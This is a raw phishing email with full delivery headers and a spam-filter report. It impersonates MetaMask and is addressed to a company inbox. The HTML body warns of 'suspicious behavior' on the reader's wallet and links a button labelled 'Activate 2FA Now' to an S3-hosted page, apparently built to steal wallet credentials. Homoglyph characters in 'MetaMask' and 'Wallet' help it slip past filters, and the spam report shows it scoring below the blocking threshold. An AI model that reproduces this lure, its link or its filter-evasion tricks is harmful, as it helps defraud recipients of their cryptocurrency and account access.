Return-Path: <postmaster@28c9889ad2.nxcli.io>
Delivered-To: behniwal@server.rnv.kpw.mybluehostin.me
Received: from server.rnv.kpw.mybluehostin.me
	by server.rnv.kpw.mybluehostin.me with LMTP
	id vRtbJdmJaGlAbQAAyTkJsw
	(envelope-from <postmaster@28c9889ad2.nxcli.io>)
	for <behniwal@server.rnv.kpw.mybluehostin.me>; Wed, 14 Jan 2026 23:31:53 -0700
Return-path: <postmaster@28c9889ad2.nxcli.io>
Envelope-to: info@behniwalgroup.com
Delivery-date: Wed, 14 Jan 2026 23:31:53 -0700
Received: from cloudhost-3077626.nl-west-1.nxcli.net ([185.145.13.114]:34248)
	by server.rnv.kpw.mybluehostin.me with esmtps  (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
	(Exim 4.95)
	(envelope-from <postmaster@28c9889ad2.nxcli.io>)
	id 1vgGtb-0007Gw-UL
	for info@behniwalgroup.com;
	Wed, 14 Jan 2026 23:31:53 -0700
Comment: DomainKeys? See http://domainkeys.sourceforge.net/
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=default; d=28c9889ad2.nxcli.io;
  b=gqyWC2eMlmJl+HOokn/F+npm4dfL0rqnFc4QwKzpsz9AFuHjNC9kFfYPMNNq10W02xBov+r7dh6IBiNfjAh2gHbBj1zSEmqPaDaTzNAWMh6y4PhETZW9200yFCzjKlqMtM9wy2YDXaxc4PyHgUEdiEdA8s7UR1cTt97EPSwQ+bPb7xgpmcm8n/qh8mERwyKTQX+e/r17TNzrRR+qZk55WBVWHiQTpyfe/VHsvHvUjA68gY5esn7LiGWzSgY4XExZM8GD9mXmFa6fy79KFhpoLkc3J9+6FpnDXAlJ4A4bsNUK5wNl8cFGfhfB8QisdqOuFKBPh78tXBa/y3KcoZXE0Q==;
  h=Received:Date:Message-ID:To:Subject:X-PHP-Originating-Script:From:Reply-To:MIME-Version:Content-Type:X-Mailer:X-Priority:List-Unsubscribe;
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed; d=28c9889ad2.nxcli.io; h=
	date:message-id:to:subject:from:reply-to:mime-version
	:content-type:list-unsubscribe; s=default; bh=JcMeqZ4plUqUi5pn2z
	dMUT5svgMCxG++9CwzO3Z2zfE=; b=XqKA/8lC+JaYLKpNTBEbkGUMxw4Wxufsdj
	s0314EA8tN1az+s/5ff2cjtCaPNCvj8Sw+AU23gwccSChVe7aZjEHbH80s8df+U5
	smynqdfUu2zwYTy5dA+AhL4jpPrp44olKO7n5qRzkry70cjBp06eY4L3xrdDyBSn
	ztfmnbN12D/7fY4jwxWKcup0WjGCWXb/TFmFmpT51+loUrJBdT7tWZVdNU+YHbtH
	pMIDZEZEkLFJSd/Xf4uGLZMmsFYfFT24b1I3EMnGYuG6jC+yeOd0SRjPuFeVXc85
	kfzZHhbc9d6ge+zqyrGvblRY1ugYOQuwtp45JKzwaPld2lvxDVZw==
Received: (qmail 32430 invoked by uid 10155); 15 Jan 2026 06:31:10 +0000
Date: 15 Jan 2026 06:31:10 +0000
Message-ID: <20260115063110.32428.qmail@cloudhost-3077626.nl-west-1.nxcli.net>
To: info@behniwalgroup.com
Subject: Wаllet Login Attempt – Vеrification Needed
X-PHP-Originating-Script: 10155:putin.php
From: "MetаMаsk" <fjsfy7wq@eho.io>
Reply-To: fjsfy7wq@eho.io
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
X-Mailer: PHP/8.2.20
X-Priority: 3
List-Unsubscribe: <mailto:unsubscribe@fjsfy7wq@eho.io>
X-Spam-Status: No, score=4.1
X-Spam-Score: 41
X-Spam-Bar: ++++
X-Ham-Report: Spam detection software, running on the system "server.rnv.kpw.mybluehostin.me",
 has NOT identified this incoming email as spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 Content preview:  MetaMаsk Security MetaMаsk Security Notice We've detected
    suspicious behavior linked to your wallet. To enhance security, we recommend
    activating Two-Factor Authentication (2FA). 
 Content analysis details:   (4.1 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was
                             blocked.  See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URIs: amazonaws.com]
  0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                         [185.145.13.114 listed in sa-trusted.bondedsender.org]
  0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                            [185.145.13.114 listed in bl.score.senderscore.com]
  0.0 HEADER_FROM_DIFFERENT_DOMAINS From and EnvelopeFrom 2nd level
                             mail domains are different
  1.0 FUZZY_WALLET           BODY: Obfuscated "Wallet"
  0.1 URI_HEX                URI: URI hostname has long hexadecimal sequence
  0.7 HTML_IMAGE_ONLY_20     BODY: HTML: images with 1600-2000 bytes of
                             words
  0.0 HTML_MESSAGE           BODY: HTML included in message
  0.1 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
  0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or
                             identical to background
  0.1 DKIM_SIGNED            Message has a DKIM or DK signature, not necessarily
                             valid
  2.0 PYZOR_CHECK            Listed in Pyzor
                             (https://pyzor.readthedocs.io/en/latest/)
  0.0 KAM_DMARC_STATUS       Test Rule for DKIM or SPF Failure with Strict
                             Alignment
  0.1 DKIM_INVALID           DKIM or DK signature exists, but is not valid
  0.0 T_GB_FROM_METAMASK     Metamask spam
X-Spam-Flag: NO


<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>MetaMаsk Security</title>
</head>
<body style="margin:0;padding:0;background:#f8f9fa;font-family:Arial,sans-serif;color:#222">
  <table width="100%" cellpadding="0" cellspacing="0" style="max-width:600px;margin:40px auto;background:#fff;border:1px solid #ddd;border-radius:8px">
    <tr>
      <td style="padding:20px;text-align:center">
        <img src="https://images.ctfassets.net/clixtyxoaeas/1ezuBGezqfIeifWdVtwU4c/d970d4cdf13b163efddddd5709164d2e/MetaMask-icon-Fox.svg" alt="MetaMаsk" width="48" style="margin-bottom:10px">
        <h2 style="color:#f6851b;font-size:18px;margin:10px 0 0">MetaMаsk Security Notice</h2>
      </td>
    </tr>
    <tr>
      <td style="padding:20px;font-size:15px;line-height:1.6">
        <p>We've detected suspicious behavior linked to your wallet. To enhance security, we recommend activating Two-Factor Authentication (2FA).</p>
        <p>2FA helps protect your assets even if someone knows your password.</p>
        <div style="text-align:center;margin:26px 0">
          <a href="https://access-authority-6d0e044.s3.us-east-1.amazonaws.com/index.html?id=4044704232020302701-2247" style="background:#f6851b;color:#fff;padding:12px 20px;border-radius:4px;text-decoration:none;font-weight:bold;display:inline-block">Activate 2FA Now</a>
        </div>
        <p>If you did not request this, no action is needed.</p>
      </td>
    </tr>
    <tr>
      <td style="padding:20px;text-align:center;color:#999;font-size:13px">
        © 2026 MetaMаsk. All rights reserved.
      </td>
    </tr>
  </table>
</body>
</html>